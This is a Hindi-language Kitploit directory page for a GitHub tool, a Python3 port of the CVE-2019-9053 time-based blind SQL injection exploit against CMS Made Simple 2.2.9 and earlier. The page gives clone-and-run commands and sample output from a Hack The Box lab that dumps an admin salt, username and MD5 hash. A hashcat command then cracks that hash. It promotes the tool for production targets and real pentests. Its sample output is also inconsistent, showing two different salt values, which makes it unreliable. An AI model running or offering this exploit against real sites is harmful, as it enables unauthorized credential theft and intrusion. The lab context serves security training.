Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cmsms-sqli — Python3 एक्स्प्लॉइट CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi) के लिए। कोई डिपेंडेंसी नहीं, टाइम-बेस्ड ब्लाइंड SQLi → एडमिन क्रेडेंशियल्स डंप। HTB राइटअप ओन्ड। | Kitploit
उपकरण/GitHubGitHub/tim-karov/cmsms-sqli
पासवर्ड क्रैकिंगभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंग
GitHubtim-karov/cmsms-sqli

cmsms-sqli

Python3 एक्स्प्लॉइट CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi) के लिए। कोई डिपेंडेंसी नहीं, टाइम-बेस्ड ब्लाइंड SQLi → एडमिन क्रेडेंशियल्स डंप। HTB राइटअप ओन्ड।

रिपॉजिटरी देखें
57 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CMS Made Simple <= 2.2.9 SQL इंजेक्शन (CVE-2019-9053) - Python3 एक्सप्लॉइट

मूल Exploit-DB #46635 (Daniele Scanu द्वारा) का शुद्ध Python3 पोर्ट। समय-आधारित ब्लाइंड SQLi के माध्यम से कमजोर CMS Made Simple इंस्टॉलेशन से एडमिन क्रेडेंशियल्स डंप करना।

🎯 विशेषताएं:

✅ कोई बाहरी निर्भरता नहीं (केवल requests)
✅ Python 3.6+ मूल (f-strings, walrus operator)
✅ सुंदर रंगीन आउटपुट (ANSI)
✅ स्थिर और तेज़ (~3-5 मिनट डंप औसत कनेक्शन पर)
✅ प्रोडक्शन लक्ष्यों के लिए टाइमआउट/एरर हैंडलिंग
✅ हैशकैट-तैयार आउटपुट (salt + MD5 फॉर्मेट)

🚀 उपयोग:

root@kitploit:~
# Clone & run
git clone https://github.com/tim-karov/cmsms-sqli
cd cmsms-sqli
python3 cmsms-sqli.py url
root@kitploit:~
# Example output (HTB Writeup):
[+] CVE-2019-9053 CMS Made Simple SQLi (Python3)
[+] Target: http://machine_ip/writeup/moduleinterface.php?mact=News,m1_,default,0
[+] Dumping SALT...
5a599ef579066807
[+] Salt: L7b8v5p3
[+] Dumping USERNAME...
jkr
[+] Username: jkr
[+] Dumping PASSWORD MD5...
62def4866937f08cc13bab43bb14e6f7
[+] MD5 Hash: 62def4866937f08cc13bab43bb14e6f7
[+] Crack: hashcat -a 0 -m 20 '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' /usr/share/wordlists/rockyou.txt

🔧 अनुकूलन:

root@kitploit:~
TIME = 3      # Sleep time (slower = more stable)
timeout = 20  # Request timeout
chars = '...' # Custom charset

📝 श्रेय:

मूल लेखक: Daniele Scanu

Exploit-DB: #46635

Python3 पोर्ट और सुधार: Tim Karov

📄 लाइसेंस:

MIT लाइसेंस - LICENSE देखें


⭐ उपयोगी लगे तो स्टार करें! HTB/TryHackMe लैब्स और वास्तविक पेनटेस्ट में उपयोग किया गया।

टूल डाउनलोड करें